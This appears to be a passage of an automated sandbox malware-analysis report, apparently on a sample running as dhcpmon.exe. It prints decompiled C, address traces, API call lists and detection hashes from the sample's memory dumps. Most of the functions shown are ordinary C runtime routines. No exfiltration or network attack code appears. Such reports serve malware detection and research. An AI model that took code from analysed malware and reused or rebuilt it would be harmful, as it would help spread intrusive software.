                0x00407a1f
                0x00407a22
                0x00407a25
                0x00407a27
                0x00407a29
                0x00407a2b
                0x00407a77
                0x00407a77
                0x00407a79
                0x00407a79
                0x00407a7b
                0x00407ab5
                0x00407ab6
                0x00000000
                0x00407abb
                0x00407a8f
                0x00407a94
                0x00407a96
                0x00000000
                0x00000000
                0x00407a9a
                0x00407a9b
                0x00407a9c
                0x00407a9f
                0x00407adb
                0x00407ade
                0x00407aa1
                0x00407aa1
                0x00407aa2
                0x00407aa2
                0x00407aaf
                0x00407ab1
                0x00407ab3
                0x00407ae4
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00407ab3
                0x00407a2d
                0x00407a30
                0x00407a32
                0x00407a34
                0x00407a36
                0x00407a39
                0x00407a3e
                0x00407a59
                0x00407a5b
                0x00407a65
                0x00407a67
                0x00407a68
                0x00407a6a
                0x00000000
                0x00000000
                0x00407a6c
                0x00407a72
                0x00407a72
                0x00000000
                0x00407a72
                0x00407a40
                0x00407a42
                0x00407a46
                0x00407a4b
                0x00407a4d
                0x00407a4f
                0x00000000
                0x00000000
                0x00407a51
                0x00000000
                0x00407a51
                0x004079e7
                0x004079ec
                0x00000000
                0x00000000
                0x004079f2
                0x004079f4
                0x00000000
                0x00000000
                0x00407a10
                0x00407a14
                0x00000000
                0x00000000
                0x00000000
                0x00407a1a
                0x0040794d
                0x0040794f
                0x00407951
                0x00407959
                0x00407978
                0x0040797a
                0x00407984
                0x00407986
                0x00407987
                0x00407989
                0x00000000
                0x00000000
                0x0040798f
                0x00407995
                0x00407995
                0x00000000
                0x00407995
                0x0040795d
                0x00407961
                0x00407966
                0x0040796a
                0x00000000
                0x00000000
                0x00407970
                0x00000000
                0x00407970

                APIs
                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00407B20,?,?,00000000), ref: 00407929
                • __alloca_probe_16.LIBCMT ref: 00407961
                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00407B20,?,?,00000000,?,?,?), ref: 004079AF
                • __alloca_probe_16.LIBCMT ref: 00407A46
                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00407AA9
                • __freea.LIBCMT ref: 00407AB6
                  • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                • __freea.LIBCMT ref: 00407ABF
                • __freea.LIBCMT ref: 00407AE4
                Memory Dump Source
                • Source File: 0000000E.00000001.300556989.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000E.00000001.300644075.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                • String ID:
                • API String ID: 3864826663-0
                • Opcode ID: 4e2b16b33ddca4ab3ce0f4135b96e08b33a6f9acdfd16cac7d83fd7473779ac7
                • Instruction ID: 6b6c65cbb01c1feb5c42b87555946cb45975c344a51f119bfb313b5904e0f739
                • Opcode Fuzzy Hash: 4e2b16b33ddca4ab3ce0f4135b96e08b33a6f9acdfd16cac7d83fd7473779ac7
                • Instruction Fuzzy Hash: BA51D572B04216ABDB259F64CC41EAF77A9DB40760B15463EFC04F62C1DB38ED50CAA9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00408226, Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                Download Yara Rule
                C-Code - Quality: 72%
                			E00408226(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __ebx;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t93;
				long _t96;
				void _t104;
				void* _t111;
				signed int _t115;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t136;
				signed int _t138;
				void* _t139;

				_t78 =  *0x412014; // 0x3bac56c0
				_v8 = _t78 ^ _t138;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t115 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4130a0 + _t118 * 4)) + _t115 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t136 = _a4;
				_v60 = _t86;
				 *_t136 = 0;
				 *((intOrPtr*)(_t136 + 4)) = 0;
				 *((intOrPtr*)(_t136 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x4130a0 + _v48 * 4));
					_t123 =  *(_t129 + _t115 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E00405FC6(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
							} else {
								_t111 = E00407222( &_v28, _t133, 2);
								_t139 = _t139 + 0xc;
								if(_t111 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t115 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t93 = E00407222();
						_t139 = _t139 + 0xc;
						if(_t93 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t96;
							if(_t96 != 0) {
								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
									L19:
									 *_t136 = GetLastError();
								} else {
									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t104 = 0xd;
											_v32 = _t104;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				E004018CC();
				return _t136;
			}



































                0x0040822e
                0x00408235
                0x00408238
                0x00408240
                0x00408244
                0x00408250
                0x00408253
                0x00408256
                0x0040825d
                0x00408265
                0x00408268
                0x0040826e
                0x00408274
                0x00408279
                0x0040827b
                0x0040827e
                0x00408283
                0x0040828d
                0x00408294
                0x00408297
                0x0040829e
                0x004082a5
                0x004082d1
                0x004082f7
                0x004082f9
                0x00000000
                0x004082d3
                0x004082d6
                0x0040839d
                0x004083a9
                0x004083b4
                0x004083b9
                0x004082dc
                0x004082e3
                0x004082e8
                0x004082ee
                0x004082f4
                0x00000000
                0x004082f4
                0x004082ee
                0x004082d6
                0x004082a7
                0x004082ab
                0x004082ae
                0x004082b4
                0x004082b6
                0x004082b9
                0x004082bd
                0x004082fa
                0x004082fd
                0x004082fe
                0x00408303
                0x00408309
                0x0040830f
                0x0040831e
                0x00408324
                0x0040832a
                0x0040832f
                0x0040834b
                0x004083be
                0x004083c4
                0x0040834d
                0x00408355
                0x0040835e
                0x00408364
                0x00000000
                0x00408366
                0x00408368
                0x0040836b
                0x00408384
                0x00000000
                0x00408386
                0x0040838a
                0x0040838c
                0x0040838f
                0x00000000
                0x0040838f
                0x0040838a
                0x00408384
                0x00408364
                0x0040835e
                0x0040834b
                0x0040832f
                0x00408309
                0x00000000
                0x00408392
                0x00408392
                0x004083c6
                0x004083d0
                0x004083d8

                APIs
                • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,0040899B,?,00000000,?,00000000,00000000), ref: 00408268
                • __fassign.LIBCMT ref: 004082E3
                • __fassign.LIBCMT ref: 004082FE
                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00408324
                • WriteFile.KERNEL32(?,?,00000000,0040899B,00000000,?,?,?,?,?,?,?,?,?,0040899B,?), ref: 00408343
                • WriteFile.KERNEL32(?,?,00000001,0040899B,00000000,?,?,?,?,?,?,?,?,?,0040899B,?), ref: 0040837C
                Memory Dump Source
                • Source File: 0000000E.00000001.300556989.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000E.00000001.300644075.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                • String ID:
                • API String ID: 1324828854-0
                • Opcode ID: faa740b07254e6310bf4514787e462a3298cd29c6bed95f9d4542f2984ff3bdb
                • Instruction ID: fe7485239ce71f502252f8dacad0a730230a626615d7e560becd3163b8212ce1
                • Opcode Fuzzy Hash: faa740b07254e6310bf4514787e462a3298cd29c6bed95f9d4542f2984ff3bdb
                • Instruction Fuzzy Hash: B551C070900209EFCB10CFA8D985AEEBBF4EF59300F14416EE995F3291EB359951CB68
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00403632, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON
                Download Yara Rule
                C-Code - Quality: 27%
                			E00403632(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _t10;
				int _t12;
				int _t18;
				signed int _t20;

				_t10 =  *0x412014; // 0x3bac56c0
				_v8 = _t10 ^ _t20;
				_v12 = _v12 & 0x00000000;
				_t12 =  &_v12;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
				if(_t12 != 0) {
					_t12 = GetProcAddress(_v12, "CorExitProcess");
					_t18 = _t12;
					if(_t18 != 0) {
						E0040C15C();
						_t12 =  *_t18(_a4);
					}
				}
				if(_v12 != 0) {
					_t12 = FreeLibrary(_v12);
				}
				E004018CC();
				return _t12;
			}









                0x00403639
                0x00403640
                0x00403643
                0x00403647
                0x00403652
                0x0040365a
                0x00403665
                0x0040366b
                0x0040366f
                0x00403676
                0x0040367c
                0x0040367c
                0x0040367e
                0x00403683
                0x00403688
                0x00403688
                0x00403693
                0x0040369b

                APIs
                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002), ref: 00403652
                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00403665
                • FreeLibrary.KERNEL32(00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000), ref: 00403688
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000001.300556989.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000E.00000001.300644075.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: AddressFreeHandleLibraryModuleProc
                • String ID: CorExitProcess$mscoree.dll
                • API String ID: 4061214504-1276376045
                • Opcode ID: cf427baca09bca2fe7784295da489c0a85b1d2c95ce850e6db67983e50b5df7d
                • Instruction ID: 2a5f1b52f49e2644cdc997ca28138b4c7ff7fe3d24fc8903f8dd75b8825c5772
                • Opcode Fuzzy Hash: cf427baca09bca2fe7784295da489c0a85b1d2c95ce850e6db67983e50b5df7d
                • Instruction Fuzzy Hash: D7F0A431A0020CFBDB109FA1DD49B9EBFB9EB04711F00427AF805B22A0DB754A40CA98
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004062B8, Relevance: 7.6, APIs: 5, Instructions: 110COMMON
                Download Yara Rule
                C-Code - Quality: 79%
                			E004062B8(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __ebx;
				void* __edi;
				signed int _t34;
				signed int _t40;
				int _t45;
				int _t52;
				void* _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t71;
				signed int _t72;
				short* _t73;

				_t34 =  *0x412014; // 0x3bac56c0
				_v8 = _t34 ^ _t72;
				_push(_t53);
				E00403F2B(_t53,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t52 =  *(_v24 + 8);
					_t57 = _t52;
					_a24 = _t52;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					E004018CC();
					return _t67;
				}
				_t55 = _t40 + _t40;
				_t17 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				if((_t17 & _t40) == 0) {
					_t71 = 0;
					L11:
					if(_t71 != 0) {
						E00402460(_t67, _t71, _t67, _t55);
						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
						if(_t45 != 0) {
							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
						}
					}
					L14:
					E004063D5(_t71);
					goto L15;
				}
				_t20 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				_t47 = _t40 & _t20;
				_t21 = _t55 + 8; // 0x8
				_t63 = _t21;
				if((_t40 & _t20) > 0x400) {
					asm("sbb eax, eax");
					_t71 = E00403E3D(_t63, _t47 & _t63);
					if(_t71 == 0) {
						goto L14;
					}
					 *_t71 = 0xdddd;
					L9:
					_t71 =  &(_t71[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E004018E0();
				_t71 = _t73;
				if(_t71 == 0) {
					goto L14;
				}
				 *_t71 = 0xcccc;
				goto L9;
			}























                0x004062c0
                0x004062c7
                0x004062ca
                0x004062d3
                0x004062d8
                0x004062dd
                0x004062e2
                0x004062e5
                0x004062e7
                0x004062e7
                0x004062ec
                0x00406305
                0x0040630b
                0x00406310
                0x004063af
                0x004063b3
                0x004063b8
                0x004063b8
                0x004063cc
                0x004063d4
                0x004063d4
                0x00406316
                0x00406319
                0x0040631e
                0x00406322
                0x0040636e
                0x00406370
                0x00406372
                0x00406377
                0x0040638e
                0x00406396
                0x004063a6
                0x004063a6
                0x00406396
                0x004063a8
                0x004063a9
                0x00000000
                0x004063ae
                0x00406324
                0x00406329
                0x0040632b
                0x0040632d
                0x0040632d
                0x00406335
                0x00406352
                0x0040635c
                0x00406361
                0x00000000
                0x00000000
                0x00406363
                0x00406369
                0x00406369
                0x00000000
                0x00406369
                0x00406339
                0x0040633d
                0x00406342
                0x00406346
                0x00000000
                0x00000000
                0x00406348
                0x00000000

                APIs
                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00406305
                • __alloca_probe_16.LIBCMT ref: 0040633D
                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0040638E
                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004063A0
                • __freea.LIBCMT ref: 004063A9
                  • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                Memory Dump Source
                • Source File: 0000000E.00000001.300556989.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000E.00000001.300644075.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                • String ID:
                • API String ID: 313313983-0
                • Opcode ID: adeb378ec079a85da5c13e5064e0c973eb82cbf5b51a7efbab845db40916055f
                • Instruction ID: a1348b344bfdb8beedea85c2379656fd8e164ea4191dcb9080565a587d22e55f
                • Opcode Fuzzy Hash: adeb378ec079a85da5c13e5064e0c973eb82cbf5b51a7efbab845db40916055f
                • Instruction Fuzzy Hash: AE31B072A0020AABDF249F65DC85DAF7BA5EF40310B05423EFC05E6290E739CD65DB94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405751, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON
                Download Yara Rule
                C-Code - Quality: 95%
                			E00405751(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x412fc8 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x40cd48 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x3bac56c1
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}










                0x00405756
                0x0040575a
                0x00405761
                0x00405765
                0x00405773
                0x00405789
                0x0040578d
                0x004057b6
                0x004057b8
                0x004057bc
                0x004057bf
                0x004057bf
                0x004057c5
                0x004057c7
                0x00000000
                0x004057c8
                0x0040578f
                0x00405798
                0x004057a7
                0x0040579a
                0x0040579d
                0x004057a3
                0x004057a3
                0x004057ab
                0x00000000
                0x004057ad
                0x004057b0
                0x004057b2
                0x00000000
                0x004057b2
                0x004057ab
                0x00405767
                0x0040576c
                0x00000000

                APIs
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue), ref: 00405783
                • GetLastError.KERNEL32(?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000,00000364,?,004043F2), ref: 0040578F
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000), ref: 0040579D
                Memory Dump Source
                • Source File: 0000000E.00000001.300556989.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000E.00000001.300644075.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: LibraryLoad$ErrorLast
                • String ID:
                • API String ID: 3177248105-0
                • Opcode ID: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                • Instruction ID: a071a87d579bf16c10ed97f701b3afe57148fc5a73c01e838bdae708b7fec84a
                • Opcode Fuzzy Hash: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                • Instruction Fuzzy Hash: 2001AC36612622DBD7214BA89D84E577BA8EF45B61F100635FA05F72C0D734D811DEE8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00404320, Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                Download Yara Rule
                C-Code - Quality: 71%
                			E00404320(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x412064; // 0xffffffff
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00403ECE(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E004058CE(_t25, __eflags,  *0x412064, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00404192(_t25, _t31, 0x4132a4);
							E00403E03(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00403E03();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00403E8B(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x412064; // 0xffffffff
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E00403ECE(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E004058CE(_t27, __eflags,  *0x412064, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00404192(_t27, _t32, 0x4132a4);
									E00403E03(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00403E03();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00405878(_t25, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E00405878(_t23, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}





















                0x00404320
                0x00404320
                0x00404320
                0x0040432a
                0x0040432c
                0x00404331
                0x00404334
                0x00404342
                0x00404349
                0x0040434e
                0x00404351
                0x00404354
                0x00404366
                0x0040436b
                0x0040436d
                0x00404378
                0x0040437f
                0x00404384
                0x00404387
                0x00404389
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0040436f
                0x0040436f
                0x00000000
                0x0040436f
                0x00404356
                0x00404356
                0x00404357
                0x00404357
                0x0040435c
                0x00404397
                0x00404398
                0x0040439e
                0x004043a3
                0x004043a6
                0x004043a7
                0x004043a8
                0x004043af
                0x004043b1
                0x004043b3
                0x004043b8
                0x004043bb
                0x004043c9
                0x004043d5
                0x004043d8
                0x004043db
                0x004043ed
                0x004043f2
                0x004043f4
                0x004043ff
                0x00404405
                0x0040440d
                0x0040440f
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004043f6
                0x004043f6
                0x00000000
                0x004043f6
                0x004043dd
                0x004043dd
                0x004043de
                0x004043de
                0x00404411
                0x00404412
                0x00404412
                0x004043bd
                0x004043c3
                0x004043c7
                0x0040441a
                0x0040441b
                0x00404421
                0x00000000
                0x00000000
                0x00000000
                0x004043c7
                0x00404428
                0x00404428
                0x00404336
                0x0040433c
                0x00404340
                0x0040438b
                0x0040438c
                0x00404396
                0x00000000
                0x00000000
                0x00000000
                0x00404340

                APIs
                • GetLastError.KERNEL32(?,?,004037D2,?,?,004016EA,00000000,?,00410E40), ref: 00404324
                • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 0040438C
                • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 00404398
                • _abort.LIBCMT ref: 0040439E
                Memory Dump Source
                • Source File: 0000000E.00000001.300556989.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000E.00000001.300644075.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: ErrorLast$_abort
                • String ID:
                • API String ID: 88804580-0
                • Opcode ID: 227254afb7dcebec3390116ce234b4a72ae62694c4cbaa731daa6ca1d097f5c4
                • Instruction ID: 10f1ed76ee289f7058500775698c1b2aead1ecf844b9f3100802fdeea25ad27f
                • Opcode Fuzzy Hash: 227254afb7dcebec3390116ce234b4a72ae62694c4cbaa731daa6ca1d097f5c4
                • Instruction Fuzzy Hash: 75F0A976204701A6C21237769D0AB6B2A1ACBC1766F25423BFF18B22D1EF3CCD42859D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004025BA, Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004025BA() {
				void* _t4;
				void* _t8;

				E00402AE5();
				E00402A79();
				if(E004027D9() != 0) {
					_t4 = E0040278B(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E00402815();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}





                0x004025ba
                0x004025bf
                0x004025cb
                0x004025d0
                0x004025d5
                0x004025d7
                0x004025e2
                0x004025d9
                0x004025d9
                0x00000000
                0x004025d9
                0x004025cd
                0x004025cd
                0x004025cf
                0x004025cf

                APIs
                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004025BA
                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004025BF
                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 004025C4
                  • Part of subcall function 004027D9: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004027EA
                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004025D9
                Memory Dump Source
                • Source File: 0000000E.00000001.300556989.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000E.00000001.300644075.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                • String ID:
                • API String ID: 1761009282-0
                • Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                • Instruction ID: 4128bea016199bb2a2d03f508bec19fe8aa18f4adc422371eefe93b2158e2da6
                • Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                • Instruction Fuzzy Hash: E0C0024414014264DC6036B32F2E5AA235409A63CDBD458BBA951776C3ADFD044A553E
                Uniqueness

                Uniqueness Score: -1.00%

                Analysis Process: dhcpmon.exe PID: 6752 Parent PID: 3472 dhcpmon.exeCOMMON

                Executed Functions

                Function 02850705, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON
                Download Yara Rule
                APIs
                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 02850807
                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 028509D4
                Memory Dump Source
                • Source File: 0000000F.00000002.324036287.0000000002850000.00000040.00000001.sdmp, Offset: 02850000, based on PE: false
                Similarity
                • API ID: CreateFileFreeVirtual
                • String ID:
                • API String ID: 204039940-0
                • Opcode ID: a31ddf8ab6fa1553e31ef8f8ebf533154cdda46e8ec2b8a06eaa7384c21ee20d
                • Instruction ID: c65c753a7ede10e97c8e6629572fd8d3e13393109f9fb42b53826280a418d4c5
                • Opcode Fuzzy Hash: a31ddf8ab6fa1553e31ef8f8ebf533154cdda46e8ec2b8a06eaa7384c21ee20d
                • Instruction Fuzzy Hash: 43A1EE78E00219EFEF10CBE4C985BADBBB1BF0831AF20445AE914FA2A4D7755A40DF51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02851205, Relevance: 9.9, APIs: 4, Strings: 1, Instructions: 1172fileCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 0285101F: Sleep.KERNELBASE(?,?,034CF0BF), ref: 02851044
                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 02852050
                Strings
                Memory Dump Source
                • Source File: 0000000F.00000002.324036287.0000000002850000.00000040.00000001.sdmp, Offset: 02850000, based on PE: false
                Similarity
                • API ID: CreateFileSleep
                • String ID: 40fbb79f6fda487d8f06db1c793101bd
                • API String ID: 2694422964-1192784401
                • Opcode ID: bbe41873a6fbe4824ddb1bc01cae172123ace91d6be65c8ab8d238b5546e4da5
                • Instruction ID: cefebbd4721606d506f1566900cdb46f87ac2faa80591370454e51b5b42a4ccf
                • Opcode Fuzzy Hash: bbe41873a6fbe4824ddb1bc01cae172123ace91d6be65c8ab8d238b5546e4da5
                • Instruction Fuzzy Hash: 14A2B719A94398A8EB70C7A4BC16BFD6371AF44B10F1054C7EA0CEE1E1D7B51ED49B0A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 02850034, Relevance: 6.6, APIs: 4, Instructions: 552processthreadCOMMON
                Download Yara Rule
                APIs
